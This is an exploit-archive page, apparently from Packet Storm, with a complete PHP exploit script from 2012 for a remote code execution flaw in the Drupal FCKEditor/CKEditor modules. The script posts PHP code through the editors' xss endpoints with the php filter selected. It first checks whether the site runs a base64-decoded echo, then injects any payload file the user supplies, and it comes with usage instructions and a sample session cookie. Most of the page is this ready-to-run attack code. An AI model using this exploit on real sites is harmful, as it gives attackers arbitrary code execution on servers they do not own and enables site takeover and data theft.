exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Drupal FCKEditor/CKEditor PHP Execution

Drupal FCKEditor/CKEditor PHP Execution
Posted Mar 24, 2012
Authored by Patroscan

Drupal FCKEditor/CKEditor module remote PHP code execution exploit.

tags | exploit, remote, php, code execution
SHA-256 | 9e74376ea72715e60cb7ca770018968f4efbcf2157614024104a526a99df39c9

Drupal FCKEditor/CKEditor PHP Execution

Change Mirror Download
<?php
# Exploit Title: Drupal FCKEditor/CKEditor module remote PHP execution
# Date: March 19, 2012
# Author: Patroscon
# Software Link: http://drupal.org/project/ckeditor, http://drupal.org/project/fckeditor
# Version: FCKEditor 6.x-2.2, CKEditor 6.x-1.8, CKEditor 7.x-1.6.
# Tested on: Linux, Windows
# Vendor Advisory: http://drupal.org/node/1482528


# Description
#
# It is possible to instruct FCKEditor and CKEditor module to pass text trough a chosen filter.
# If the PHP filter module is enabled, users can chose to run this filter on chosen code.
#
# See http://drupal.org/1482528

/*
* Patroscon has RISEN!
*
* Exploits SA-CONTRIB-2012-040 (http://drupal.org/node/1482528).
*
* Required: vulnerable site must also use PHP filter module.
* Required for Drupal 6 exploit: You must have access permission listed in advisory.
*
* Point to the Drupal root.
*
* Use php patroscon.php http://example.com/ [cookie] [payloadfile]
*
* example:
*
* To check if the site can be exploited: php patroscon.php http://example.com/
* If you need a cookie: php patroscon.php http://example.com/ 'SESSa6a82714802c2c37ba16036f1faf01d4=g6TYq0r2mT8wCTQTKiYl6x2lIdRL1H21Db5CbomcKqU'
*
* It's possible to provide a filename with PHP exploit code. It will be executed when detection was succesful. When you provide the payload file
* you must also provide a cookie argument. This may be a nonsense cookie.
*
* example:
*
* php patroscon.php http://example.com/ 'whatever' ./admin_sid.php
*
* Exploit code must be wrapped in <?php ?> tags. See admin_sid.php for an example.
*
*/

if (!isset($argv[1])) {
echo "You must give URL such as http://example.com/";
return;
}

$site = $argv[1];
$cookie = isset($argv[2]) ? $argv[2] : '';
$payloadfile = isset($argv[3]) ? $argv[3] : '';

$exploits = array(
'fckeditor' => array(
'path' => 'fckeditor/xss',
'pre' => 'filters[0]=php/0&text=',
),
'ckeditor v6' => array(
'path' => 'ckeditor/xss',
'pre' => 'filters[0]=php/0&text=',
),
'ckeditor v7' => array(
'path' => 'ckeditor/xss',
'pre' => 'filters[0]=aaa&textformat_filters=true&input_format=php_code&text=',
),
);

echo "\nWorking on $site";
foreach ($exploits as $editor => $exploit) {
echo "\n - $editor";
$url = $site . '/?q=' . urlencode($exploit['path']);
$result = post($url, $exploit['pre'] . urlencode("<?php echo base64_decode('cGF0cm9zY29uIGhhcyByaXNlbg=='); ?>"), $cookie);

switch ($result['info']['http_code']) {
case 200:
if ($result['content'] == 'patroscon has risen') {
echo "\n - exploitable";
if ($payloadfile) {
echo "\n - injecting payload";
$payload = file_get_contents($payloadfile);
$result = post($url, $exploit['pre'] . urlencode($payload), $cookie);
echo "\n\n********* Payload result [{$result['info']['http_code']}] ******************************************************************";
echo "\n" . $result['content'];
echo "\n********** End payload **************************************************************************";
}
echo "\n";
return;
}
else {
echo "\n - unable to execute PHP";
}
break;
case 404:
echo "\n - not installed";
break;
case 403:
echo "\n - access denied";
break;
default:
echo "\n - an unknown error occured.";
}
}

echo "\n";

function post($url, $fields, $cookie) {
$handle = curl_init($url);
if (!$handle) {
return;
}

curl_setopt_array($handle, array(
CURLOPT_POST => TRUE,
CURLOPT_POSTFIELDS => $fields,
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_COOKIE => $cookie,
));

$result = curl_exec($handle);
$info = curl_getinfo($handle);

curl_close($handle);
return array('content' => $result, 'info' => $info);
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close